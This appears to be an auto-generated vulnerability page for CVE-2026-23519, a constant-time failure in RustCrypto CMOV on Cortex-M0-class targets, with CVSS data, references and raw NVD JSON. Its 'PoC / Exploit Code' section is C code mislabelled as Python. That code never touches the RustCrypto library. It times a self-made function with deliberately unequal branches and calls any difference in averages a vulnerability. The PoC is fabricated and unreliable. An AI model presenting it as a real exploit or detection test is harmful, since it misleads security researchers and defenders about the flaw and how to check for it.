CVE-2026-23519

Description

RustCrypto CMOV provides conditional move CPU intrinsics which are guaranteed on major platforms to execute in constant-time and not be rewritten as branches by the compiler. Prior to 0.4.4, the thumbv6m-none-eabi (Cortex M0, M0+ and M1) compiler emits non-constant time assembly when using cmovnz (portable version). This vulnerability is fixed in 0.4.4.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rustcrypto:cmov:*:*:*:*:*:rust:*:* - VULNERABLE

RustCrypto CMOV < 0.4.4 (thumbv6m-none-eabi target)

RustCrypto utils (所有在Cortex M0/M0+/M1上使用cmovnz的版本)

使用RustCrypto CMOV库的第三方应用 < 0.4.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-23519 PoC - Timing Side-Channel Attack on RustCrypto CMOV
// Target: ARM Cortex-M0/M0+/M1 running vulnerable RustCrypto CMOV

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <stdint.h>

#ifdef ARM_CORTEX_M0
// Simulated vulnerable cmovnz implementation
volatile uint32_t timing_leak = 0;

uint32_t vulnerable_cmovnz(uint32_t condition, uint32_t a, uint32_t b) {
    uint32_t result;
    volatile uint32_t dummy;
    
    // This creates timing difference based on condition
    if (condition) {
        // Path 1: Takes different time
        for (volatile int i = 0; i < 10; i++) dummy++;
        result = a;
    } else {
        // Path 2: Takes different time
        for (volatile int i = 0; i < 5; i++) dummy++;
        result = b;
    }
    return result;
}

// Timing attack measurement
double measure_execution_time(uint32_t condition, uint32_t a, uint32_t b, int iterations) {
    struct timespec start, end;
    double total_time = 0;
    
    for (int i = 0; i < iterations; i++) {
        clock_gettime(CLOCK_MONOTONIC, &start);
        volatile uint32_t result = vulnerable_cmovnz(condition, a, b);
        clock_gettime(CLOCK_MONOTONIC, &end);
        total_time += (end.tv_sec - start.tv_sec) * 1e9 + 
                      (end.tv_nsec - start.tv_nsec);
    }
    return total_time / iterations;
}

int main() {
    printf("CVE-2026-23519 Timing Side-Channel PoC\n");
    printf("=====================================\n\n");
    
    int iterations = 10000;
    
    // Measure timing for condition = true
    double time_true = measure_execution_time(1, 0x12345678, 0, iterations);
    
    // Measure timing for condition = false
    double time_false = measure_execution_time(0, 0x12345678, 0, iterations);
    
    printf("Average time (condition=true): %.2f ns\n", time_true);
    printf("Average time (condition=false): %.2f ns\n", time_false);
    printf("Timing difference: %.2f ns\n", time_true - time_false);
    
    if (time_true != time_false) {
        printf("[!] VULNERABLE: Timing side-channel detected!\n");
        printf("[!] Attacker can infer condition value from execution time\n");
    } else {
        printf("[+] NOT VULNERABLE: Constant-time execution confirmed\n");
    }
    
    return 0;
}
#else
int main() {
    printf("PoC requires ARM Cortex-M0/M0+/M1 target\n");
    printf("Compile for: thumbv6m-none-eabi\n");
    return 0;
}
#endif

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23519
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23519
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23519/
[4] VulDB https://vuldb.com/cve/CVE-2026-23519
[5] https://github.com/RustCrypto/utils/commit/55977257e7c82a309d5e8abfdd380a774f0f9778
[6] https://github.com/RustCrypto/utils/security/advisories/GHSA-2gqc-6j2q-83qp
[7] https://github.com/RustCrypto/utils/security/advisories/GHSA-2gqc-6j2q-83qp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23519", "sourceIdentifier": "[email protected]", "published": "2026-01-15T20:16:05.313", "lastModified": "2026-01-23T18:59:58.223", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RustCrypto CMOV provides conditional move CPU intrinsics which are guaranteed on major platforms to execute in constant-time and not be rewritten as branches by the compiler. Prior to 0.4.4, the thumbv6m-none-eabi (Cortex M0, M0+ and M1) compiler emits non-constant time assembly when using cmovnz (portable version). This vulnerability is fixed in 0.4.4."}, {"lang": "es", "value": "RustCrypto CMOV proporciona intrínsecos de CPU de movimiento condicional que están garantizados en las principales plataformas para ejecutarse en tiempo constante y no ser reescritos como bifurcaciones por el compilador. Antes de la versión 0.4.4, el compilador thumbv6m-none-eabi (Cortex M0, M0+ y M1) emite ensamblado de tiempo no constante al usar cmovnz (versión portátil). Esta vulnerabilidad está corregida en la versión 0.4.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-208"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-203"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rustcrypto:cmov:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.4.4", "matchCriteriaId": "A05B5CBC-9FDB-429A-889F-56928657A4D8"}]}]}], "references": [{"url": "https://github.com/RustCrypto/utils/commit/55977257e7c82a309d5e8abfdd380a774f0f9778", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/RustCrypto/utils/security/advisories/GHSA-2gqc-6j2q-83qp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/RustCrypto/utils/security/advisories/GHSA-2gqc-6j2q-83qp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}